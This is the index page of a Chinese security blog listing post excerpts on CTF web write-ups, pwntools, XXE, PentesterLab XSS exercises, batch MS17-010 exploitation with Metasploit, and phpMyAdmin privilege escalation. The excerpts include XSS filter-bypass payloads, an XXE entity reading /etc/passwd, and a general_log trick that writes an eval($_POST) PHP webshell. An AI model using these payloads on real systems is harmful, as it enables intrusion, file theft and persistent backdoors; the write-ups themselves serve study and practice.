醉梦半醒的博客

醉梦半醒的博客

iloveflag.com

pwn学习笔记
pwntools常用指令p64(int) 8个bite为一组,最小的放前面,依次排列u64(str) 上面的逆过程p32(int)u32(str)remote(host, port) / process(path).recv(int) 7 => Hello world! => ‘Hello w’.recvuntil(str) ‘or’ => Hello world! => ‘Hello wor’.recvline() === .recvuntil(‘\n’).send(str) ‘payload’ => ‘payload’.sendline(str) ‘...
2019西湖论剑web
web1进入首页发现include $_GET[‘file’]在底部发现提示用php伪协议读出源码base64解密后为123456<?php$a = @$_GET['dir'];if(!$a){$a = '/tmp';}var_dump(scandir($a)); 目录穿越发现flag回到首页读取flag web2xss,发现script被过滤了利用iframe标签加data base64编码绕过payload:1<iframe src="data:text/html;base64,PHNjcmlwdCB...
XXE
#后端代码 <?php $xml=simplexml_load_string($_GET[‘xml’]) print_r((string)$xml); ?> #XML语法 <!DOCTYPE 文件名 [ <!ENTITY 实体名 “实体内容”> ]> #XXE <!DOCTYPE xxx[ <!ENTITY name SYSTEM “file:///etc/passwd”> ]> %26name; &编码为%26,否则GET请求...
Hexo
Update to Hexo
Python脚本与Metasploit交互批量产出MS17_010 shell
文章首发于安恒网络空间安全讲武堂: https://mp.weixin.qq.com/s?__biz=MzU1MzE3Njg2Mw==&mid=2247486376&idx=2&sn=9a49858e4fb27fb41942b252f43cf68f&chksm=fbf791d8cc8018ce178dfeb612f28ad08e7ca503195f1609ff4928d409a6e9e127514f86ca22 #前言:2017年5月,被称为近10年来影响范围最广泛“最嚣张”的WannaCry勒索病毒席卷全球,据统计,全球共有150多个国家超30万台终端被...
关于本网站被黑的说明
今天晚上8点的时候来查笔记的时候,发现自己的博客被劫持到了http://mashina.com/mblog/2019/02/06/will-paying-collections-improve-credit-score/该地址,可能想到网站被挂马了,难道是平时写的博文太烂了,大佬看不下去了???我第一时间想到了网站可能被挂马了,在仔细检查首页后,并没有发现问题,然后请教了几个大佬,重点翻了下是否被js跳转了,又看了下服务器登录的日志~场景开始陷入僵局,难道是被域名劫持了??好像也不对,dns也没出问题啊,舍弃域名,输入ip地址照样跳转了 ,那就是网页出现了问题,在群里听到:”...
pentesterlab中xss+Code injection的练习
1.<script>alert(“xss”)</script> 普通xss 2.<Script>alert(“xss”)</Script> 大小写绕过,<script>被替换,preg_replace 函数替换成空 3.<scri<script>pt>alert(“xss”)</scri</script>pt> <script>被替换,preg_replace 函数替换成空 4.<img src=”1″ onerror=”ale...
hgame2019 部分web-wp
Level – Week 1 谁吃了我的flag:根据题目提示可以看出是vim泄露vim -r http://118.25.111.31:10086/.index.html.swp 换头大作战: very easy web:url双次编码绕过http://120.78.184.111:8080/week1/very_ez/index.php?id=%2576%2569%2564%2561%2572 can u find me?: Level-week 2 easy_php:http://118.24.25.25:9999/easyphp/img/index.php?...
phpMyAdmin提权
  信息收集: Select @@datadir;SHOW VARIABLES LIKE “log%”SHOW VARIABLES LIKE “general%” 写马:set global general_log = “ON”;SET global general_log_file=’网站根目录’;select “<?php eval($_POST[‘pass’]);”;SELECT “<?phpeval($_...
mysqli_error()
mysqli_error()用于调试返回的错误sql信息 代码之前一直是用的mysqli连接,使用了mysql_error()一直echo不出 因为是mysqli连接,所以必须要用mysqli_error去调试信息 如下:   $dbServername="localhost"; $dbUsername="root"; $dbPassword=""; $dbName="loginsystem"; $conn=mysqli_connect($dbServername,$dbUsername,$dbPassword,$dbName); $id=$_GET['id']; $sql=...